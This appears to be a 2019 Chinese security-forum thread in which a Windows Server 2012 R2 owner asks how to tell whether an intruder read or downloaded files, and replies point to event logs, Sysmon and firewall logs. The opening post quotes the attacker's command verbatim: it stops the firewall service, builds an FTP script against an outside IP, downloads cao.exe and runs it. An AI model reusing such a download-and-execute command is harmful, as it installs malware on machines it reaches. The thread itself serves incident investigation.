查看: 1074|回复: 9
收起左侧

[系统] [服务器安全]如何判断此服务器数据是否被盗?

[复制链接]
wkl17
发表于 2019-2-27 08:12:46 | 显示全部楼层 |阅读模式
本帖最后由 wkl17 于 2019-2-27 08:14 编辑

假设某台 Windows Server 2008R2 / 2012R2 被入侵了,各位会使用什么方法判断某些文件是否被下载或读取过(比如 abc.txt 文件)?

Windows 的文件访问时间 感觉似乎不是我们通常理解的那样,也即:只读访问后 它的时间属性不会有任何变化。所以似乎无法通过文件访问时间 判断 abc.txt 这个文件是否被人访问或下载过?

还有其它可行的方法来判断吗?

或者更直接一点说吧。有一台作为远程桌面用的 Windows,没跑什么服务。

但我今天发现 cmd 命令行有些异常命令(因为执行某个不存在的 exe 卡住了,所以我通过 procexp 查看到这个异常命令)。

刚搜了一下,命令就像这个 2011 年的百度知道问题:https://zhidao.baidu.com/question/263547971.html

有个 cmd 尝试执行 ftp 命令行下载某个 exe 程序 并执行。但好在我服务器安装了火绒,根据 火绒的日志,已成功阻止了它下载。虽然也没什么重要数据,但我好奇的是,这个入侵者能执行类似这样的命令:c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 117.41.184.58> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe

那服务器上的某个文件(比如刚才举例的 abc.txt )如果被入侵者下载或读取过,是否有办法判断出来?比如Windows NTFS流 等等的信息?

ELOHIM
发表于 2019-2-27 08:27:24 | 显示全部楼层
可能需要到事件日志里面查看。
前提是你设置好了日志的查看类型。
如果没有提前设置,是看不到的。
只好依赖第三方的日志了。
VLBI
发表于 2019-2-27 14:25:11 | 显示全部楼层
本帖最后由 VLBI 于 2019-2-27 14:34 编辑

日志 审核(日志量会太太太太太太太大)
换成我,先找有没有第三方的工具
wkl17
 楼主| 发表于 2019-2-27 20:49:19 | 显示全部楼层
@ELOHIM
@VLBI

我当时有粗看了 Windows 系统日志,应用程序、安全、系统 这 3 项日志没有发现什么明显异常的日志信息。而且文件读取记录肯定也不会记录在 Windows 系统日志的。服务器也没有跑 Web,所以也没有 Web 日志。

我遇到的情况跟百度知道那个问题很像,也是先尝试 net1 stop sharedaccess (不过被 HIPS 阻止了)。
各位认为对方执行这样的命令,可能是通过什么漏洞来实现的?

服务器是 2K12 R2,除了 R2 的近 900MB 的补丁和 xx 月恶意软件删除工具 没打,其它的补丁很久以前都打过了。

因为也没跑 web,所以打了补丁后 也没做更多的优化,只是使用 HIPS 类软件控制联网(需手工放行)

但我刚才 netstat,发现 137、138、445 的端口还是处于监听状态。不过我也测试了从外网 telnet,

确认这几个端口无法从外网通讯。(应该是被防火墙挡下了)。
wkl17
 楼主| 发表于 2019-2-27 20:50:21 | 显示全部楼层
论坛不能 @ 么?

或者,假如想分析对方究竟是利用什么漏洞来入侵的,各位可有分析的方法或工具分享一下?谢谢。
ELOHIM
发表于 2019-2-27 21:11:36 | 显示全部楼层
wkl17 发表于 2019-2-27 20:50
论坛不能 @ 么?

或者,假如想分析对方究竟是利用什么漏洞来入侵的,各位可有分析的方法或工具分享一下 ...

Sysmon[64].exe   
那你试试这个吧。
除了日志,你想在哪发现入侵痕迹呢??

评分

参与人数 1人气 +1 收起 理由
VLBI + 1 感谢提供分享

查看全部评分

VLBI
发表于 2019-2-28 08:43:37 | 显示全部楼层
本帖最后由 VLBI 于 2019-2-28 08:56 编辑

@    成功了的
系统日志可以显示的,只是日志量太大了。建议你试试ELOHIM的方法


如果真入侵了,估计也会把日志删除了吧,没了日志,查什么呢?

评分

参与人数 1人气 +1 收起 理由
ELOHIM + 1 我是山寨~

查看全部评分

ELOHIM
发表于 2019-2-28 10:13:13 | 显示全部楼层
如果你的防火墙日志设置的好,有异地备份没有被黑客删除的话,也可以查一下。
在特殊的时间,哪个进程有哪些诡异的进出站信息,端口使用情况等。

不过就像7楼所言,高手进来会抹去痕迹的。。除非忘了。
wkl17
 楼主| 发表于 2019-3-1 05:32:18 | 显示全部楼层
本帖最后由 wkl17 于 2019-3-1 05:37 编辑

@ELOHIM
@VLBI

感谢二位的分享与解答。Sysmon应该是Procmon的前身?不知道是否有一些系统资源监控的工具?比如磁盘IO、CPU、内存 使用率的监控工具?
网络带宽监控我用的networx (5.5.5版本是最后一个免费版)。
但不知道是否有像networx这么好的免费工具,能同时监控上述几项?
哪位如果知道这样的工具请分享一下。

我此次主要是想了解 黑客是否会通过命令行控制台,more等命令读取个别文本文件。
如果是其他可执行文件或非文本数据,黑客应该没有盗走,否则它就不会尝试通过cmd执行ftp下载病毒文件了。
日志没有被黑客清空,但是看了 也没有什么重要发现。
感觉入口应该还是Windows组件。我暂时先将一些服务关闭了: WinRM  MSMQ lmhosts(NetBIOS) ScDeviceEnum(SmartCard相关服务)

mifanu
发表于 2019-3-3 17:18:27 | 显示全部楼层
这只是一个病毒,后期会下载一些挖矿的程序,不会盗取你的数据。放心吧。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 21:17 , Processed in 0.191225 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表